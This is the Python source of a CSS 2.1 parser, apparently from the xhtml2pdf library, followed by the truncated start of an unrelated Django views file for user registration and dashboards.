CSSParseError(Exception):\n src = None\n ctxsrc = None\n fullsrc = None\n inline = False\n srcCtxIdx = None\n srcFullIdx = None\n ctxsrcFullIdx = None\n\n def 
__init__(self, msg, src, ctxsrc=None):\n super(Exception, self).__init__(msg)\n self.src = src\n self.ctxsrc = ctxsrc or src\n if self.ctxsrc:\n self.srcCtxIdx = self.ctxsrc.find(self.src)\n if self.srcCtxIdx < 0:\n del self.srcCtxIdx\n\n def __str__(self):\n if self.ctxsrc:\n return \"{0}:: ({1}, {2})\".format(super(Exception, self).__str__(),\n repr(self.ctxsrc[:self.srcCtxIdx]),\n repr(self.ctxsrc[self.srcCtxIdx:self.srcCtxIdx + 20]))\n else:\n return \"{0}:: {1}\".format(super(Exception, self).__str__(), repr(self.src[:40]))\n\n def setFullCSSSource(self, fullsrc, inline=False):\n self.fullsrc = fullsrc\n if inline:\n self.inline = inline\n if self.fullsrc:\n self.srcFullIdx = self.fullsrc.find(self.src)\n if self.srcFullIdx < 0:\n del self.srcFullIdx\n self.ctxsrcFullIdx = self.fullsrc.find(self.ctxsrc)\n if self.ctxsrcFullIdx < 0:\n del self.ctxsrcFullIdx\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nclass CSSParser(object):\n \"\"\"\n CSS-2.1 parser dependent only upon the re module.\n\n Implemented directly from http://www.w3.org/TR/CSS21/grammar.html\n Tested with some existing CSS stylesheets for portability.\n\n CSS Parsing API:\n * setCSSBuilder()\n To set your concrete implementation of CSSBuilderAbstract\n\n * parseFile()\n Use to parse external stylesheets using a file-like object::\n\n >>> cssFile = open('test.css', 'r')\n >>> stylesheets = myCSSParser.parse_file(cssFile)\n\n * parse()\n Use to parse embedded stylesheets using source string::\n\n >>> cssSrc = '''\n body,body.body {\n font: 110%, \"Times New Roman\", Arial, Verdana, Helvetica, serif;\n background: White;\n color: Black;\n }\n a {text-decoration: underline;}\n '''\n >>> stylesheets = myCSSParser.parse(cssSrc)\n\n * parseInline()\n Use to parse inline stylesheets using attribute source string::\n\n >>> style = 'font: 110%, \"Times New Roman\", Arial, Verdana, Helvetica, serif; background: White; color: Black'\n >>> stylesheets = myCSSParser.parse_inline(style)\n\n * parseAttributes()\n Use to parse attribute string values into inline stylesheets::\n\n >>> stylesheets = myCSSParser.parse_attributes(\n font='110%, \"Times New Roman\", Arial, Verdana, Helvetica, serif',\n background='White',\n color='Black')\n\n * parseSingleAttr()\n Use to parse a single string value into a CSS expression::\n\n >>> fontValue = myCSSParser.parse_single_attr('110%, \"Times New Roman\", Arial, Verdana, Helvetica, serif')\n \"\"\"\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ~ Constants / Variables / Etc.\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n ParseError = CSSParseError\n\n attribute_operators = ['=', '~=', '|=', '&=', '^=', '!=', '<>']\n selector_qualifiers = ('#', '.', '[', ':')\n selector_combiners = ['+', '>']\n expression_operators = ('/', '+', ',')\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ~ Regular expressions\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n _orRule = lambda *args: '|'.join(args)\n _reflags = re.I | re.M | re.U\n i_hex = '[0-9a-fA-F]'\n i_nonascii = u'[\\200-\\377]'\n i_unicode = '\\\\\\\\(?:%s){1,6}\\s?' 
% i_hex\n i_escape = _orRule(i_unicode, u'\\\\\\\\[ -~\\200-\\377]')\n # i_nmstart = _orRule('[A-Za-z_]', i_nonascii, i_escape)\n i_nmstart = _orRule('\\-[^0-9]|[A-Za-z_]', i_nonascii,\n i_escape) # XXX Added hyphen, http://www.w3.org/TR/CSS21/syndata.html#value-def-identifier\n i_nmchar = _orRule('[-0-9A-Za-z_]', i_nonascii, i_escape)\n i_ident = '((?:%s)(?:%s)*)' % (i_nmstart, i_nmchar)\n re_ident = re.compile(i_ident, _reflags)\n # Caution: treats all characters above 0x7f as legal for an identifier.\n i_unicodeid = r'([^\\u0000-\\u007f]+)'\n re_unicodeid = re.compile(i_unicodeid, _reflags)\n i_element_name = '((?:%s)|\\*)' % (i_ident[1:-1],)\n re_element_name = re.compile(i_element_name, _reflags)\n i_namespace_selector = '((?:%s)|\\*|)\\|(?!=)' % (i_ident[1:-1],)\n re_namespace_selector = re.compile(i_namespace_selector, _reflags)\n i_class = '\\\\.' + i_ident\n re_class = re.compile(i_class, _reflags)\n i_hash = '#((?:%s)+)' % i_nmchar\n re_hash = re.compile(i_hash, _reflags)\n i_rgbcolor = '(#%s{6}|#%s{3})' % (i_hex, i_hex)\n re_rgbcolor = re.compile(i_rgbcolor, _reflags)\n i_nl = u'\\n|\\r\\n|\\r|\\f'\n i_escape_nl = u'\\\\\\\\(?:%s)' % i_nl\n i_string_content = _orRule(u'[\\t !#$%&(-~]', i_escape_nl, i_nonascii, i_escape)\n i_string1 = u'\\\"((?:%s|\\')*)\\\"' % i_string_content\n i_string2 = u'\\'((?:%s|\\\")*)\\'' % i_string_content\n i_string = _orRule(i_string1, i_string2)\n re_string = re.compile(i_string, _reflags)\n i_uri = (u'url\\\\(\\s*(?:(?:%s)|((?:%s)+))\\s*\\\\)'\n % (i_string, _orRule('[!#$%&*-~]', i_nonascii, i_escape)))\n # XXX For now\n # i_uri = u'(url\\\\(.*?\\\\))'\n re_uri = re.compile(i_uri, _reflags)\n i_num = u'(([-+]?[0-9]+(?:\\\\.[0-9]+)?)|([-+]?\\\\.[0-9]+))' # XXX Added out paranthesis, because e.g. .5em was not parsed correctly\n re_num = re.compile(i_num, _reflags)\n i_unit = '(%%|%s)?' % i_ident\n re_unit = re.compile(i_unit, _reflags)\n i_function = i_ident + '\\\\('\n re_function = re.compile(i_function, _reflags)\n i_functionterm = u'[-+]?' 
+ i_function\n re_functionterm = re.compile(i_functionterm, _reflags)\n i_unicoderange1 = \"(?:U\\\\+%s{1,6}-%s{1,6})\" % (i_hex, i_hex)\n i_unicoderange2 = \"(?:U\\\\+\\?{1,6}|{h}(\\?{0,5}|{h}(\\?{0,4}|{h}(\\?{0,3}|{h}(\\?{0,2}|{h}(\\??|{h}))))))\"\n i_unicoderange = i_unicoderange1 # u'(%s|%s)' % (i_unicoderange1, i_unicoderange2)\n re_unicoderange = re.compile(i_unicoderange, _reflags)\n\n # i_comment = u'(?:\\/\\*[^*]*\\*+([^/*][^*]*\\*+)*\\/)|(?://.*)'\n # gabriel: only C convention for comments is allowed in CSS\n i_comment = u'(?:\\/\\*[^*]*\\*+([^/*][^*]*\\*+)*\\/)'\n re_comment = re.compile(i_comment, _reflags)\n i_important = u'!\\s*(important)'\n re_important = re.compile(i_important, _reflags)\n del _orRule\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ~ Public\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def __init__(self, css_builder=None):\n self._css_builder = css_builder\n\n # ~ CSS Builder to delegate to ~~~~~~~~~~~~~~~~~~~~~~~~\n\n @property\n def css_builder(self):\n \"\"\"A concrete instance implementing CSSBuilderAbstract\"\"\"\n return self._css_builder\n\n @css_builder.setter\n def css_builder(self, value):\n \"\"\"A concrete instance implementing CSSBuilderAbstract\"\"\"\n self._css_builder = value\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ~ Public CSS Parsing API\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def parse_file(self, srcFile, closeFile=False):\n \"\"\"Parses CSS file-like objects using the current cssBuilder.\n Use for external stylesheets.\"\"\"\n\n try:\n result = self.parse(srcFile.read())\n finally:\n if closeFile:\n srcFile.close()\n return result\n\n def parse(self, src):\n \"\"\"\n\n Parses CSS string source using the current cssBuilder.\n\n Use for embedded stylesheets.\n\n :param src:\n :type src: str\n \"\"\"\n\n self.css_builder.begin_stylesheet()\n if not isinstance(src, six.text_type):\n src = src.decode() # FIXME use text from the get-go\n assert isinstance(src, six.text_type), \"'src' must be text!\"\n try:\n # XXX Some simple preprocessing\n src = cleanup_css(src)\n try:\n src, stylesheet = self._parse_stylesheet(src)\n except self.ParseError as err:\n err.setFullCSSSource(src)\n raise\n finally:\n self.css_builder.end_stylesheet()\n return stylesheet\n\n def parse_inline(self, src):\n \"\"\"Parses CSS inline source string using the current cssBuilder.\n Use to parse a tag's 'style'-like attribute.\"\"\"\n self.css_builder.begin_inline()\n try:\n try:\n src, properties = self._parse_declaration_group(src.strip(), braces=False)\n except self.ParseError as err:\n err.setFullCSSSource(src, inline=True)\n raise\n\n result = self.css_builder.inline(properties)\n finally:\n self.css_builder.end_inline()\n return result\n\n def parse_attributes(self, attributes=None, **kwAttributes):\n \"\"\"Parses CSS attribute source strings, and return as an inline stylesheet.\n Use to parse a tag's highly CSS-based attributes like 'font'.\n\n See also: parseSingleAttr\n \"\"\"\n if attributes is None:\n attributes = {}\n if attributes:\n kwAttributes.update(attributes)\n\n self.css_builder.begin_inline()\n try:\n properties = []\n for propertyName, src in kwAttributes.items():\n try:\n src, property = self._parse_declaration_property(src.strip(), propertyName)\n properties.append(property)\n except self.ParseError as err:\n err.setFullCSSSource(src, inline=True)\n raise\n result = self.css_builder.inline(properties)\n finally:\n self.css_builder.end_inline()\n return result\n\n def 
parse_single_attr(self, attrValue):\n \"\"\"Parse a single CSS attribute source string, and returns the built CSS expression.\n Use to parse a tag's highly CSS-based attributes like 'font'.\n\n See also: parseAttributes\n \"\"\"\n\n results = self.parse_attributes(temp=attrValue)\n if 'temp' in results[1]:\n return results[1]['temp']\n else:\n return results[0]['temp']\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ~ Internal _parse methods\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def _parse_stylesheet(self, src):\n \"\"\"stylesheet\n : [ CHARSET_SYM S* STRING S* ';' ]?\n [S|CDO|CDC]* [ import [S|CDO|CDC]* ]*\n [ [ ruleset | media | page | font_face ] [S|CDO|CDC]* ]*\n ;\n \"\"\"\n # Get rid of the comments\n src = self.re_comment.sub(six.u(''), src)\n\n # [ CHARSET_SYM S* STRING S* ';' ]?\n src = self._parse_at_charset(src)\n\n # [S|CDO|CDC]*\n src = self._parse_s_cdo_cdc(src)\n # [ import [S|CDO|CDC]* ]*\n src, stylesheet_imports = self._parse_at_imports(src)\n\n # [ namespace [S|CDO|CDC]* ]*\n src = self._parse_at_namespace(src)\n\n stylesheet_elements = []\n\n # [ [ ruleset | atkeywords ] [S|CDO|CDC]* ]*\n while src: # due to ending with ]*\n if src.startswith('@'):\n # @media, @page, @font-face\n src, at_results = self._parse_at_keyword(src)\n if at_results is not None and at_results != NotImplemented:\n stylesheet_elements.extend(at_results)\n else:\n # ruleset\n src, ruleset = self._parse_ruleset(src)\n stylesheet_elements.append(ruleset)\n\n # [S|CDO|CDC]*\n src = self._parse_s_cdo_cdc(src)\n\n stylesheet = self.css_builder.stylesheet(stylesheet_elements, stylesheet_imports)\n return src, stylesheet\n\n def _parse_s_cdo_cdc(self, src):\n \"\"\"[S|CDO|CDC]*\"\"\"\n while True:\n src = src.lstrip()\n if src.startswith(''):\n src = src[3:]\n else:\n break\n return src\n\n # ~ CSS @ directives ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def _parse_at_charset(self, src):\n \"\"\"[ CHARSET_SYM S* STRING S* ';' ]?\"\"\"\n if is_at_rule_ident(src, 'charset'):\n ctxsrc = src\n src = strip_at_rule_ident(src)\n charset, src = self._get_string(src)\n src = src.lstrip()\n if src[:1] != ';':\n raise self.ParseError('@charset expected a terminating \\';\\'', src, ctxsrc)\n src = src[1:].lstrip()\n\n self.css_builder.at_charset(charset)\n return src\n\n def _parse_at_imports(self, src):\n \"\"\"[ import [S|CDO|CDC]* ]*\"\"\"\n result = []\n while is_at_rule_ident(src, 'import'):\n ctxsrc = src\n src = strip_at_rule_ident(src)\n\n import_, src = self._get_string_or_uri(src)\n if import_ is None:\n raise self.ParseError('Import expecting string or url', src, ctxsrc)\n\n mediums = []\n medium, src = self._get_ident(src.lstrip())\n while medium is not None:\n mediums.append(medium)\n if src[:1] == ',':\n src = src[1:].lstrip()\n medium, src = self._get_ident(src)\n else:\n break\n\n # XXX No medium inherits and then \"all\" is appropriate\n if not mediums:\n mediums = [\"all\"]\n\n if src[:1] != ';':\n raise self.ParseError('@import expected a terminating \\';\\'', src, ctxsrc)\n src = src[1:].lstrip()\n\n stylesheet = self.css_builder.at_import(import_, mediums, self)\n if stylesheet is not None:\n result.append(stylesheet)\n\n src = self._parse_s_cdo_cdc(src)\n return src, result\n\n def _parse_at_namespace(self, src):\n \"\"\"namespace :\n\n @namespace S* [IDENT S*]? 
[STRING|URI] S* ';' S*\n \"\"\"\n\n src = self._parse_s_cdo_cdc(src)\n while is_at_rule_ident(src, 'namespace'):\n ctxsrc = src\n src = strip_at_rule_ident(src)\n\n namespace, src = self._get_string_or_uri(src)\n if namespace is None:\n nsPrefix, src = self._get_ident(src)\n if nsPrefix is None:\n raise self.ParseError('@namespace expected an identifier or a URI', src, ctxsrc)\n namespace, src = self._get_string_or_uri(src.lstrip())\n if namespace is None:\n raise self.ParseError('@namespace expected a URI', src, ctxsrc)\n else:\n nsPrefix = None\n\n src = src.lstrip()\n if src[:1] != ';':\n raise self.ParseError('@namespace expected a terminating \\';\\'', src, ctxsrc)\n src = src[1:].lstrip()\n\n self.css_builder.at_namespace(nsPrefix, namespace)\n\n src = self._parse_s_cdo_cdc(src)\n return src\n\n def _parse_at_keyword(self, src):\n \"\"\"[media | page | font_face | unknown_keyword]\"\"\"\n ctxsrc = src\n if is_at_rule_ident(src, 'media'):\n src, result = self._parse_at_media(src)\n elif is_at_rule_ident(src, 'page'):\n src, result = self._parse_at_page(src)\n elif is_at_rule_ident(src, 'font-face'):\n src, result = self._parse_at_font_face(src)\n # XXX added @import, was missing!\n elif is_at_rule_ident(src, 'import'):\n src, result = self._parse_at_imports(src)\n elif is_at_rule_ident(src, 'frame'):\n src, result = self._parse_at_frame(src)\n elif src.startswith('@'):\n src, result = self._parse_at_ident(src)\n else:\n raise self.ParseError('Unknown state in atKeyword', src, ctxsrc)\n return src, result\n\n def _parse_at_media(self, src):\n \"\"\"media\n : MEDIA_SYM S* medium [ ',' S* medium ]* '{' S* ruleset* '}' S*\n ;\n \"\"\"\n ctxsrc = src\n src = src[len('@media '):].lstrip()\n mediums = []\n while src and src[0] != '{':\n medium, src = self._get_ident(src)\n if medium is None:\n raise self.ParseError('@media rule expected media identifier', src, ctxsrc)\n # make \"and ... {\" work\n if medium == u'and':\n # strip up to curly bracket\n pattern = re.compile('.*({.*)')\n match = re.match(pattern, src)\n src = src[match.end()-1:]\n break\n mediums.append(medium)\n if src[0] == ',':\n src = src[1:].lstrip()\n else:\n src = src.lstrip()\n\n if not src.startswith('{'):\n raise self.ParseError('Ruleset opening \\'{\\' not found', src, ctxsrc)\n src = src[1:].lstrip()\n\n stylesheet_elements = []\n # while src and not src.startswith('}'):\n # src, ruleset = self._parseRuleset(src)\n # stylesheetElements.append(ruleset)\n # src = src.lstrip()\n\n # Containing @ where not found and parsed\n while src and not src.startswith('}'):\n if src.startswith('@'):\n # @media, @page, @font-face\n src, atResults = self._parse_at_keyword(src)\n if atResults is not None:\n stylesheet_elements.extend(atResults)\n else:\n # ruleset\n src, ruleset = self._parse_ruleset(src)\n stylesheet_elements.append(ruleset)\n src = src.lstrip()\n\n if not src.startswith('}'):\n raise self.ParseError('Ruleset closing \\'}\\' not found', src, ctxsrc)\n else:\n src = src[1:].lstrip()\n\n result = self.css_builder.at_media(mediums, stylesheet_elements)\n return src, result\n\n def _parse_at_page(self, src):\n \"\"\"page\n : PAGE_SYM S* IDENT? pseudo_page? 
S*\n '{' S* declaration [ ';' S* declaration ]* '}' S*\n ;\n \"\"\"\n ctxsrc = src\n src = src[len('@page '):].lstrip()\n page, src = self._get_ident(src)\n if src[:1] == ':':\n pseudopage, src = self._get_ident(src[1:])\n page = page + '_' + pseudopage\n else:\n pseudopage = None\n\n # src, properties = self._parseDeclarationGroup(src.lstrip())\n\n # Containing @ where not found and parsed\n stylesheet_elements = []\n src = src.lstrip()\n properties = []\n\n # XXX Extended for PDF use\n if not src.startswith('{'):\n raise self.ParseError('Ruleset opening \\'{\\' not found', src, ctxsrc)\n else:\n src = src[1:].lstrip()\n\n while src and not src.startswith('}'):\n if src.startswith('@'):\n # @media, @page, @font-face\n src, at_results = self._parse_at_keyword(src)\n if at_results is not None:\n stylesheet_elements.extend(at_results)\n else:\n src, nproperties = self._parse_declaration_group(src.lstrip(), braces=False)\n properties += nproperties\n src = src.lstrip()\n\n result = [self.css_builder.at_page(page, pseudopage, properties)]\n\n return src[1:].lstrip(), result\n\n def _parse_at_frame(self, src):\n \"\"\"\n XXX Proprietary for PDF\n \"\"\"\n ctxsrc = src\n src = src[len('@frame '):].lstrip()\n box, src = self._get_ident(src)\n src, properties = self._parse_declaration_group(src.lstrip())\n result = [self.css_builder.at_frame(box, properties)]\n return src.lstrip(), result\n\n def _parse_at_font_face(self, src):\n ctxsrc = src\n src = src[len('@font-face '):].lstrip()\n src, properties = self._parse_declaration_group(src)\n result = [self.css_builder.at_font_face(properties)]\n return src, result\n\n def _parse_at_ident(self, src):\n ctxsrc = src\n atIdent, src = self._get_ident(src[1:])\n if atIdent is None:\n raise self.ParseError('At-rule expected an identifier for the rule', src, ctxsrc)\n\n src, result = self.css_builder.at_ident(atIdent, self, src)\n\n if result is NotImplemented:\n # An at-rule consists of everything up to and including the next semicolon (;) or the next block,\n # whichever comes first\n\n semiIdx = src.find(';')\n if semiIdx < 0:\n semiIdx = None\n blockIdx = src[:semiIdx].find('{')\n if blockIdx < 0:\n blockIdx = None\n\n if semiIdx is not None and semiIdx < blockIdx:\n src = src[semiIdx + 1:].lstrip()\n elif blockIdx is None:\n # consume the rest of the content since we didn't find a block or a semicolon\n src = src[-1:-1]\n elif blockIdx is not None:\n # expecing a block...\n src = src[blockIdx:]\n try:\n # try to parse it as a declarations block\n src, declarations = self._parse_declaration_group(src)\n except self.ParseError:\n # try to parse it as a stylesheet block\n src, stylesheet = self._parse_stylesheet(src)\n else:\n raise self.ParseError('Unable to ignore @-rule block', src, ctxsrc)\n\n return src.lstrip(), result\n\n # ~ ruleset - see selector and declaration groups ~~~~\n\n def _parse_ruleset(self, src):\n \"\"\"ruleset\n : selector [ ',' S* selector ]*\n '{' S* declaration [ ';' S* declaration ]* '}' S*\n ;\n \"\"\"\n src, selectors = self._parse_selector_group(src)\n src, properties = self._parse_declaration_group(src.lstrip())\n result = self.css_builder.ruleset(selectors, properties)\n return src, result\n\n # ~ selector parsing ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def _parse_selector_group(self, src):\n selectors = []\n while src[:1] not in ('{', '}', ']', '(', ')', ';', ''):\n src, selector = self._parse_selector(src)\n if selector is None:\n break\n selectors.append(selector)\n if src.startswith(','):\n src = src[1:].lstrip()\n 
return src, selectors\n\n def _parse_selector(self, src):\n \"\"\"selector\n : simple_selector [ combinator simple_selector ]*\n ;\n \"\"\"\n src, selector = self._parse_simple_selector(src)\n srcLen = len(src) # XXX\n while src[:1] not in ('', ',', ';', '{', '}', '[', ']', '(', ')'):\n for combiner in self.selector_combiners:\n if src.startswith(combiner):\n src = src[len(combiner):].lstrip()\n break\n else:\n combiner = ' '\n src, selectorB = self._parse_simple_selector(src)\n\n # XXX Fix a bug that occured here e.g. : .1 {...}\n if len(src) >= srcLen:\n src = src[1:]\n while src and (src[:1] not in ('', ',', ';', '{', '}', '[', ']', '(', ')')):\n src = src[1:]\n return src.lstrip(), None\n\n selector = self.css_builder.combine_selectors(selector, combiner, selectorB)\n\n return src.lstrip(), selector\n\n def _parse_simple_selector(self, src):\n \"\"\"simple_selector\n : [ namespace_selector ]? element_name? [ HASH | class | attrib | pseudo ]* S*\n ;\n \"\"\"\n ctxsrc = src.lstrip()\n nsPrefix, src = self._get_match_result(self.re_namespace_selector, src)\n name, src = self._get_match_result(self.re_element_name, src)\n if name:\n pass # already *successfully* assigned\n elif src[:1] in self.selector_qualifiers:\n name = '*'\n else:\n raise self.ParseError('Selector name or qualifier expected', src, ctxsrc)\n\n name = self.css_builder.resolve_namespace_prefix(nsPrefix, name)\n selector = self.css_builder.selector(name)\n while src and src[:1] in self.selector_qualifiers:\n hash_, src = self._get_match_result(self.re_hash, src)\n if hash_ is not None:\n selector.add_hash_id(hash_)\n continue\n\n class_, src = self._get_match_result(self.re_class, src)\n if class_ is not None:\n selector.add_class(class_)\n continue\n\n if src.startswith('['):\n src, selector = self._parse_selector_attribute(src, selector)\n elif src.startswith(':'):\n src, selector = self._parse_selector_pseudo(src, selector)\n else:\n break\n\n return src.lstrip(), selector\n\n def _parse_selector_attribute(self, src, selector):\n \"\"\"attrib\n : '[' S* [ namespace_selector ]? IDENT S* [ [ '=' | INCLUDES | DASHMATCH ] S*\n [ IDENT | STRING ] S* ]? 
']'\n ;\n \"\"\"\n ctxsrc = src\n if not src.startswith('['):\n raise self.ParseError('Selector Attribute opening \\'[\\' not found', src, ctxsrc)\n src = src[1:].lstrip()\n\n nsPrefix, src = self._get_match_result(self.re_namespace_selector, src)\n attrName, src = self._get_ident(src)\n\n src = src.lstrip()\n\n if attrName is None:\n raise self.ParseError('Expected a selector attribute name', src, ctxsrc)\n if nsPrefix is not None:\n attrName = self.css_builder.resolve_namespace_prefix(nsPrefix, attrName)\n\n for op in self.attribute_operators:\n if src.startswith(op):\n break\n else:\n op = ''\n src = src[len(op):].lstrip()\n\n if op:\n attrValue, src = self._get_ident(src)\n if attrValue is None:\n attrValue, src = self._get_string(src)\n if attrValue is None:\n raise self.ParseError('Expected a selector attribute value', src, ctxsrc)\n else:\n attrValue = None\n\n if not src.startswith(']'):\n raise self.ParseError('Selector Attribute closing \\']\\' not found', src, ctxsrc)\n else:\n src = src[1:]\n\n if op:\n selector.add_attribute_operation(attrName, op, attrValue)\n else:\n selector.add_attribute(attrName)\n return src, selector\n\n def _parse_selector_pseudo(self, src, selector):\n \"\"\"pseudo\n : ':' [ IDENT | function ]\n ;\n \"\"\"\n ctxsrc = src\n if not src.startswith(':'):\n raise self.ParseError('Selector Pseudo \\':\\' not found', src, ctxsrc)\n src = re.search('^:{1,2}(.*)', src, re.M | re.S).group(1)\n\n name, src = self._get_ident(src)\n if not name:\n raise self.ParseError('Selector Pseudo identifier not found', src, ctxsrc)\n\n if src.startswith('('):\n # function\n src = src[1:].lstrip()\n src, term = self._parse_expression(src, True)\n if not src.startswith(')'):\n raise self.ParseError('Selector Pseudo Function closing \\')\\' not found', src, ctxsrc)\n src = src[1:]\n selector.add_pseudo_function(name, term)\n else:\n selector.add_pseudo(name)\n\n return src, selector\n\n # ~ declaration and expression parsing ~~~~~~~~~~~~~~~\n\n def _parse_declaration_group(self, src, braces=True):\n ctxsrc = src\n if src.startswith('{'):\n src, braces = src[1:], True\n elif braces:\n raise self.ParseError('Declaration group opening \\'{\\' not found', src, ctxsrc)\n\n properties = []\n src = src.lstrip()\n while src[:1] not in ('', ',', '{', '}', '[', ']', '(', ')', '@'): # XXX @?\n src, property = self._parse_declaration(src)\n\n # XXX Workaround for styles like \"*font: smaller\"\n if src.startswith(\"*\"):\n src = \"-nothing-\" + src[1:]\n continue\n\n if property is None:\n break\n properties.append(property)\n if src.startswith(';'):\n src = src[1:].lstrip()\n else:\n break\n\n if braces:\n if not src.startswith('}'):\n raise self.ParseError('Declaration group closing \\'}\\' not found', src, ctxsrc)\n src = src[1:]\n\n return src.lstrip(), properties\n\n def _parse_declaration(self, src):\n \"\"\"declaration\n : ident S* ':' S* expr prio?\n | /* empty */\n ;\n \"\"\"\n # property\n property_name, src = self._get_ident(src)\n\n if property_name is not None:\n src = src.lstrip()\n # S* : S*\n if src[:1] in (':', '='):\n # Note: we are being fairly flexable here... 
technically, the\n # \":\" is *required*, but in the name of flexibility we\n # suppor a null transition, as well as an \"=\" transition\n src = src[1:].lstrip()\n\n src, property = self._parse_declaration_property(src, property_name)\n else:\n property = None\n\n return src, property\n\n def _parse_declaration_property(self, src, propertyName):\n # expr\n src, expr = self._parse_expression(src)\n\n # prio?\n important, src = self._get_match_result(self.re_important, src)\n src = src.lstrip()\n\n property = self.css_builder.property(propertyName, expr, important)\n return src, property\n\n def _parse_expression(self, src, returnList=False):\n \"\"\"\n expr\n : term [ operator term ]*\n ;\n \"\"\"\n src, term = self._parse_expression_term(src)\n operator = None\n while src[:1] not in ('', ';', '{', '}', '[', ']', ')'):\n for operator in self.expression_operators:\n if src.startswith(operator):\n src = src[len(operator):]\n break\n else:\n operator = ' '\n src, term2 = self._parse_expression_term(src.lstrip())\n if term2 is NotImplemented:\n break\n else:\n term = self.css_builder.combine_terms(term, operator, term2)\n\n if operator is None and returnList:\n term = self.css_builder.combine_terms(term, None, None)\n return src, term\n else:\n return src, term\n\n def _parse_expression_term(self, src):\n \"\"\"term\n : unary_operator?\n [ NUMBER S* | PERCENTAGE S* | LENGTH S* | EMS S* | EXS S* | ANGLE S* |\n TIME S* | FREQ S* | function ]\n | STRING S* | IDENT S* | URI S* | RGB S* | UNICODERANGE S* | hexcolor\n ;\n \"\"\"\n ctxsrc = src\n\n result, src = self._get_match_result(self.re_num, src)\n if result is not None:\n units, src = self._get_match_result(self.re_unit, src)\n term = self.css_builder.term_number(result, units)\n return src.lstrip(), term\n\n result, src = self._get_string(src, self.re_uri)\n if result is not None:\n # XXX URL!!!!\n term = self.css_builder.term_uri(result)\n return src.lstrip(), term\n\n result, src = self._get_string(src)\n if result is not None:\n term = self.css_builder.term_string(result)\n return src.lstrip(), term\n\n result, src = self._get_match_result(self.re_functionterm, src)\n if result is not None:\n src, params = self._parse_expression(src, True)\n if src[0] != ')':\n raise self.ParseError('Terminal function expression expected closing \\')\\'', src, ctxsrc)\n src = src[1:].lstrip()\n term = self.css_builder.term_function(result, params)\n return src, term\n\n result, src = self._get_match_result(self.re_rgbcolor, src)\n if result is not None:\n term = self.css_builder.term_rgb(result)\n return src.lstrip(), term\n\n result, src = self._get_match_result(self.re_unicoderange, src)\n if result is not None:\n term = self.css_builder.term_unicode_range(result)\n return src.lstrip(), term\n\n nsPrefix, src = self._get_match_result(self.re_namespace_selector, src)\n result, src = self._get_ident(src)\n if result is not None:\n if nsPrefix is not None:\n result = self.css_builder.resolve_namespace_prefix(nsPrefix, result)\n term = self.css_builder.term_ident(result)\n return src.lstrip(), term\n\n result, src = self._get_match_result(self.re_unicodeid, src)\n if result is not None:\n term = self.css_builder.term_ident(result)\n return src.lstrip(), term\n\n return self.css_builder.term_unknown(src)\n\n # ~ utility methods ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def _get_ident(self, src, default=None):\n return self._get_match_result(self.re_ident, src, default)\n\n def _get_string(self, src, rexpression=None, default=None):\n if rexpression is None:\n 
rexpression = self.re_string\n result = rexpression.match(src)\n if result:\n strres = filter(None, result.groups())\n if strres:\n try:\n strres = strres[0]\n except Exception:\n strres = result.groups()[0]\n else:\n strres = ''\n return strres, src[result.end():]\n else:\n return default, src\n\n def _get_string_or_uri(self, src):\n result, src = self._get_string(src, self.re_uri)\n if result is None:\n result, src = self._get_string(src)\n return result, src\n\n def _get_match_result(self, rexpression, src, default=None, group=1):\n result = rexpression.match(src)\n if result:\n return result.group(group), src[result.end():]\n else:\n return default, src\n\n","sub_path":"xhtml2pdf/w3c/cssParser.py","file_name":"cssParser.py","file_ext":"py","file_size_in_byte":40603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"275854763","text":"from django.shortcuts import render, redirect\nfrom provaserver.forms import RegistrationForm\nfrom django.contrib.auth.forms import UserChangeForm\nfrom django.contrib.auth.decorators import login_required\nfrom provaserver.models import Impianto, Sensore, Rilevazione, Terze_Parti\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom untitled1.serializers import RilevSerializer, SensoreSerializer, ImpiantoSerializer\n\n\ndef login_redirect(self):\n\n return redirect('/login')\n\n\n# view di registrazione:\n\n\ndef register(request):\n if request.method == 'POST':\n form = RegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/login')\n else:\n return redirect('/register')\n else:\n form = RegistrationForm()\n args = {'form': form}\n return render(request, 'provaserver/reg_form.html', args)\n\n# view visualizzazione profilo admin o cliente:\n\n\n@login_required\ndef view_profile(request):\n\n args = {'user': request.user}\n utente = request.user.is_staff\n\n if utente:\n\n return render(request, 'provaserver/profile.html', args)\n else:\n return redirect('/dashboard')\n\n# view visualizzazione dashboard impianti:\n\n\n@login_required\ndef view_dashboard(request):\n\n impianti = Impianto.objects.all().filter(user=request.user) # prendi l'utente loggato porca la madonna puttana\n context = {'impianti': impianti}\n return render(request, 'provaserver/dashboard.html', context)\n\n# view visualizzazione dashboard sensori:\n\n\n@login_required\ndef view_sensors(request):\n sensori = Sensore.objects.all().filter(user=request.user)\n context1 = {'sensori': sensori}\n return render(request, 'provaserver/sensors.html', context1)\n\n# view visualizzazione dashboard rilevazioni:\n\n\n@login_required\ndef view_detections(request):\n rilevazioni = Rilevazione.objects.all().filter(user=request.user)\n context = {'rilevazioni': 